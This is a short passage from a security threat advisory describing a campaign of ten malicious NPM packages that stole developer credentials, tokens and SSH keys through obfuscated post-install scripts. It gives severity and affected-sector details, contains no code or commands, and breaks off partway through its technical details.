EXECUTIVE SUMMARY
Security researchers have uncovered 10 malicious NPM packages designed to steal developer credentials and other sensitive data from infected systems. The malicious packages, published on the official NPM registry, targeted developers across Windows, macOS, and Linux environments by impersonating legitimate open-source libraries. Once installed, these packages executed obfuscated scripts to exfiltrate environment variables, authentication tokens, SSH keys, and system information to remote attacker-controlled servers. This campaign is an example of software supply chain compromise, affecting developers who unknowingly installed the malicious packages through automated build systems or dependency chains.
- Threat Type: Credential Theft
- Active Region: Global
- Affected Sector: Cloud, Software Development, CI/CD Environment
- Affected Product: Node.js, NPM-based projects
- Severity: Critical
- Published Date: October 29, 2025
TECHNICAL DETAILS
- Attack Vector: Attackers leveraged the NPM ecosystem to publish packages mimicking legitimate libraries. Upon installation, post-installation scripts triggered obfuscated JavaScript that executed system commands to gather credentials and environment variables.
- Initial Access: Through NPM install of compromised libraries (e.g., via…..
